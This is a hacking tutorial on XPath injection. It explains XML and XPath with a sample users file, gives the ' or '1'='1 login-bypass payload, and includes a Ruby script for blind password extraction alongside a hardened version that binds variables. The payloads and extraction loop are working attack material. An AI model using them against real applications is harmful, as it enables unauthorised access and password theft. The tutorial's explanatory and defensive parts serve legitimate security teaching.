How to Hack using XPATH?
[Don't forget to read the note at the end of the Tutorial]
Every day a lot of websites are hacked, and most of the people doing it are after nothing but popularity. Today's tutorial is on XPath Injection, in which I will explain how a website is attacked using XPath Injection. Take a typical web application architecture as an example: all data is stored on a database server, which may hold it in various formats, such as an LDAP directory, XML documents or an RDBMS. The application queries that server and returns information based on the user's input.
Normally attackers try to extract more information than they are allowed to by manipulating the query with specially crafted inputs. In this tutorial we'll be discussing XPath Injection techniques to extract data from XML databases. Before we go deeper into XPath injection, let's take a brief look at what XML and XPath are.
What is XML?
XML stands for "Extensible Markup Language" and was designed to describe data. It lets programmers define their own tags to structure the data they store. An XML document can play the same role as an RDBMS database; the difference is in how the data is stored. In a relational database the data is stored in tables (rows and columns); in XML it is stored in nodes, in a tree.
What is XPath?
XPath is a query language used to select data from XML data sources. It is increasingly common for web applications to use XML data files on the back end and to query them with XPath, much the same way SQL is used against a relational database. XPath injection, much like SQL injection, exists when a malicious user can insert arbitrary XPath code into form fields and URL query parameters, so that it is passed straight into the XPath query evaluation engine. Doing so lets any user bypass authentication (if an XML-based authentication system is used) or access restricted data from the XML data source. One difference from SQL is worth knowing before we start: XPath has no permissions or access control inside the document, so a single injection point can reach every node of the file. Let's look at an example of how XPath works. Assume that the database is represented by the following XML file:
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>r00t3xpl0it</username>
<password>123</password>
<account>admin</account>
</user>
<user>
<username>moderator2</username>
<password>m0d2</password>
<account>guest</account>
</user>
<user>
<username>moderator3</username>
<password>m0d3</password>
<account>guest</account>
</user>
</users>
The above file shows how the username, password and account details are stored in XML. The following XPath query returns the account of the user whose username is 'r00t3xpl0it' and whose password is '123' (against the file above it returns admin):
string(//user[username/text()='r00t3xpl0it' and password/text()='123']/account/text())
If the application developer does not properly filter user input, I can easily inject XPath code and interfere with the query result. For instance, I could input the following values:
Username: ' or '1'='1
Password: ' or '1'='1
Using these above parameters, the query becomes:
string(//user[username/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())
As in most common SQL injection attacks, I have created a query that always evaluates to true, which means that the application will authenticate the user even though neither a valid username nor a valid password was provided. Note the precedence: XPath binds and more tightly than or, so the predicate reads as username='' or ('1'='1' and password='') or '1'='1', and it is the final or '1'='1' that makes it true for every user node; string() then returns the value of the first matching node in document order, which here is admin. And as in a common SQL injection attack, the first step when testing for XPath injection is to insert a single quote ( ' ) in the field to be tested, introducing a syntax error in the query (an unterminated string literal), and to check whether the application returns an error message.
If there is no knowledge of the XML data's internal details, and the application does not provide useful error messages that help us reconstruct its internal logic, it is still possible to perform a Blind XPath Injection attack (I will explain that in future posts), whose goal is to reconstruct the whole data structure. The technique is similar to inference-based (Boolean) SQL injection: the approach is to inject code that turns the query into a yes/no question, so that each request leaks one bit of information, for example whether a given character of a node's value matches a guess.
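To make the bypass above and the blind technique concrete, here is an added example (my own code, not part of the original tutorial) in Ruby using the standard REXML library. It loads the same three-user file, builds the tutorial's query by string splicing so the ' or '1'='1 bypass works, turns the same injection point into a yes/no oracle that recovers a known user's password one character at a time, and contrasts both with the same query written with XPath variables ($u, $p), which keeps the input as data. The function names, the alphabet tried by the blind loop and the inline users.xml are constructed for this example.

```ruby
require 'rexml/document'

# Constructed sample data: the same three users as the tutorial's users.xml.
USERS_XML = <<~XML
  <users>
    <user><username>r00t3xpl0it</username><password>123</password><account>admin</account></user>
    <user><username>moderator2</username><password>m0d2</password><account>guest</account></user>
    <user><username>moderator3</username><password>m0d3</password><account>guest</account></user>
  </users>
XML
DOC = REXML::Document.new(USERS_XML)

# VULNERABLE: the tutorial's query, with user input spliced into the expression.
# Returns the account name on success, nil when no <user> matches.
def vulnerable_login(user, pass, doc = DOC)
  xpath = "//user[username/text()='#{user}' and password/text()='#{pass}']/account/text()"
  node = REXML::XPath.first(doc, xpath)   # first match in document order, like string()
  node && node.value
end

# HARDENED: same query, but $u and $p are bound as XPath variables, so quotes
# and operators inside the input are compared as literal text, never parsed.
def safe_login(user, pass, doc = DOC)
  xpath = "//user[username/text()=$u and password/text()=$p]/account/text()"
  node = REXML::XPath.first(doc, xpath, {}, { 'u' => user, 'p' => pass })
  node && node.value
end

# Blind oracle: one yes/no answer per login attempt. The payload keeps the
# username check, ANDs it with a test on one character of that user's password,
# and appends "or '1'='2" so the application's own password comparison is
# swallowed by the precedence rule:
#   username='X' and substring(password,pos,1)='c'  or  ('1'='2' and password='x')
def char_matches?(target_user, pos, ch)
  payload = "#{target_user}' and substring(password/text(),#{pos},1)='#{ch}' or '1'='2"
  !vulnerable_login(payload, 'x').nil?
end

# Characters tried at each position (constructed for the demo). Quotes are left
# out because they would break the injected literal instead of being compared.
ALPHABET = [*'0'..'9', *'a'..'z', *'A'..'Z', '!', '#', '_', '-']

# Recovers target_user's password character by character. substring() past the
# end of the value returns '', which matches no candidate, so the loop stops there.
def extract_password(target_user, max_len = 32)
  recovered = +''
  (1..max_len).each do |pos|
    ch = ALPHABET.find { |c| char_matches?(target_user, pos, c) }
    break if ch.nil?
    recovered << ch
  end
  recovered
end

if __FILE__ == $PROGRAM_NAME
  puts "normal login:     #{vulnerable_login('r00t3xpl0it', '123').inspect}"
  puts "bypass (vuln):    #{vulnerable_login("' or '1'='1", "' or '1'='1").inspect}"
  puts "bypass (safe):    #{safe_login("' or '1'='1", "' or '1'='1").inspect}"
  puts "blind extraction: #{extract_password('r00t3xpl0it').inspect}"
end
```

Every call to char_matches? is an ordinary login attempt; the application only tells the attacker "logged in" or "not logged in", and that single bit per request is what the blind technique builds on. safe_login is the fix that matters: bind input through variables. If the XPath API you use has no variable binding, remember that XPath 1.0 has no escape sequence for quotes, so either reject input containing quotes or assemble the literal with concat(); a deny-list of other characters is not enough on its own.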
<note>
If you enjoyed it, be sure to hit like and share. Also, ask us in the comments if you haven't understood anything.
And as always, you are solely responsible for any misuse of the contents here. Team IHA will not be held responsible or liable for any type of damage caused by you. </note>